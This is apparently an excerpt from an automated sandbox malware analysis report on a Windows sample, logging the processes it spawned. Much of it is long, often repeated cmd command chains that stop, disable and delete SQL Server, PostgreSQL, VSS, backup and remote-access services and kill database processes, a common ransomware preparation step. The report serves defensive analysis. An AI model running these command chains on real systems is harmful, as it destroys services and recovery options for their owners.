        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c sc delete "mssqlfdlauncher"&&sc delete "mssqlserver"&&sc delete "sqlserveragent"&&sc delete "sqlbrowser"&&sc delete "sqltelemetry"&&sc delete "msdtsserver130"&&sc delete "ssistelemetry130"&&sc delete "sqlwriter"&&sc delete "mssql$veeamsql2012"&&sc delete "sqlagent$veeamsql2012"&&sc delete "mssql"&&sc delete "sqlagent"&&sc delete "mssqlserveradhelper100"&&sc delete "mssqlserverolapservice"&&sc delete "msdtsserver100"&&sc delete "reportserver"&&sc delete "sqltelemetry$hl"&&sc delete "tmbmserver"&&sc delete "mssql$progid"&&sc delete "mssql$wolterskluwer"&&sc delete "sqlagent$progid"&&sc delete "sqlagent$wolterskluwer"&&sc delete "mssqlfdlauncher$optima"&&sc delete "mssql$optima"&&sc delete "sqlagent$optima"&&sc delete "reportserver$optima"&&sc delete "msftesql$sqlexpress"&&sc delete "postgresql-x64-9.4"&&rem kill "sql"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im msdtssrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im ssms.exe&&taskkill -f -im sqlagent.exe&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im reportingservicesservice.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exeJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete "xt800service_personal" & @sc delete sqlserveragent & @sc delete sqlwriter & @sc delete sqlbrowser & @sc delete mssqlfdlauncher & @sc delete mssqlserver & @sc delete qcsoftservice & @sc delete mssqlserverolapservice & @sc delete vmtools & @sc delete vgauthservice & @sc delete msdtc & @sc delete teamviewer & @sc delete reportserver & @sc delete rabbitmq & @sc delete "ahs service" & @sc delete "sense shield service" & @sc delete ssmonitorservice & @sc delete sssyncservice & @sc delete tplusstdappservice1300 & @sc delete mssql$sql2008 & @sc delete sqlagent$sql2008 & @sc delete tplusstdtaskservice1300 & @sc delete tplusstdupgradeservice1300 & @sc delete virboxwebserver & @sc delete jhi_service & @sc delete lms & @sc delete "fontcache3.0.0.0" & @sc delete "osp service""
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00404462 AllocateAndInitializeSid,SetEntriesInAclW,SetNamedSecurityInfoW,LocalFree,FreeSid,10_2_00404462
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00409250 cpuid 10_2_00409250
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: wnsprintfA,SleepEx,GetLogicalDrives,wnsprintfA,GetDiskFreeSpaceExA,GetComputerNameA,GetLocaleInfoA,GetNativeSystemInfo,wnsprintfA,UrlEscapeA,wnsprintfW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,wnsprintfA,wnsprintfA,wnsprintfA,CreateFileW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,wnsprintfA,wnsprintfA,UrlUnescapeA,wnsprintfA,WriteFile,CloseHandle,10_2_00405D2B
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00409651 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,10_2_00409651
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc config SQLSERVERAGENT start=disabled & net stop SQLBrowser & sc config SQLBrowser start=disabled & net stop vss & sc config vss start=disabled & net stop SQLWriter & sc config SQLWriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config MSSQL$FE_EXPRESS start= disabled & net stop MSSQL$RE_EXPRESS & net stop SQLANYs_Sage_FAS_Fixed_Assets & sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled & net stop MSSQL$VIM_SQLEXP & sc config MSSQL$VIM_SQLEXP start=disabled & net stop "MSSQLFDLauncher" & net stop "MSSQLSERVER""
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc config SQLSERVERAGENT start=disabled & net stop SQLBrowser & sc config SQLBrowser start=disabled & net stop vss & sc config vss start=disabled & net stop SQLWriter & sc config SQLWriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config MSSQL$FE_EXPRESS start= disabled & net stop MSSQL$RE_EXPRESS & net stop SQLANYs_Sage_FAS_Fixed_Assets & sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled & net stop MSSQL$VIM_SQLEXP & sc config MSSQL$VIM_SQLEXP start=disabled & net stop "MSSQLFDLauncher" & net stop "MSSQLSERVER""
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc config SQLSERVERAGENT start=disabled & net stop SQLBrowser & sc config SQLBrowser start=disabled & net stop vss & sc config vss start=disabled & net stop SQLWriter & sc config SQLWriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config MSSQL$FE_EXPRESS start= disabled & net stop MSSQL$RE_EXPRESS & net stop SQLANYs_Sage_FAS_Fixed_Assets & sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled & net stop MSSQL$VIM_SQLEXP & sc config MSSQL$VIM_SQLEXP start=disabled & net stop "MSSQLFDLauncher" & net stop "MSSQLSERVER""
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc config SQLSERVERAGENT start=disabled & net stop SQLBrowser & sc config SQLBrowser start=disabled & net stop vss & sc config vss start=disabled & net stop SQLWriter & sc config SQLWriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config MSSQL$FE_EXPRESS start= disabled & net stop MSSQL$RE_EXPRESS & net stop SQLANYs_Sage_FAS_Fixed_Assets & sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled & net stop MSSQL$VIM_SQLEXP & sc config MSSQL$VIM_SQLEXP start=disabled & net stop "MSSQLFDLauncher" & net stop "MSSQLSERVER""
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc config SQLSERVERAGENT start=disabled & net stop SQLBrowser & sc config SQLBrowser start=disabled & net stop vss & sc config vss start=disabled & net stop SQLWriter & sc config SQLWriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config MSSQL$FE_EXPRESS start= disabled & net stop MSSQL$RE_EXPRESS & net stop SQLANYs_Sage_FAS_Fixed_Assets & sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled & net stop MSSQL$VIM_SQLEXP & sc config MSSQL$VIM_SQLEXP start=disabled & net stop "MSSQLFDLauncher" & net stop "MSSQLSERVER""
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc config SQLSERVERAGENT start=disabled & net stop SQLBrowser & sc config SQLBrowser start=disabled & net stop vss & sc config vss start=disabled & net stop SQLWriter & sc config SQLWriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config MSSQL$FE_EXPRESS start= disabled & net stop MSSQL$RE_EXPRESS & net stop SQLANYs_Sage_FAS_Fixed_Assets & sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled & net stop MSSQL$VIM_SQLEXP & sc config MSSQL$VIM_SQLEXP start=disabled & net stop "MSSQLFDLauncher" & net stop "MSSQLSERVER""
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc config SQLSERVERAGENT start=disabled & net stop SQLBrowser & sc config SQLBrowser start=disabled & net stop vss & sc config vss start=disabled & net stop SQLWriter & sc config SQLWriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config MSSQL$FE_EXPRESS start= disabled & net stop MSSQL$RE_EXPRESS & net stop SQLANYs_Sage_FAS_Fixed_Assets & sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled & net stop MSSQL$VIM_SQLEXP & sc config MSSQL$VIM_SQLEXP start=disabled & net stop "MSSQLFDLauncher" & net stop "MSSQLSERVER""
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc config SQLSERVERAGENT start=disabled & net stop SQLBrowser & sc config SQLBrowser start=disabled & net stop vss & sc config vss start=disabled & net stop SQLWriter & sc config SQLWriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config MSSQL$FE_EXPRESS start= disabled & net stop MSSQL$RE_EXPRESS & net stop SQLANYs_Sage_FAS_Fixed_Assets & sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled & net stop MSSQL$VIM_SQLEXP & sc config MSSQL$VIM_SQLEXP start=disabled & net stop "MSSQLFDLauncher" & net stop "MSSQLSERVER""
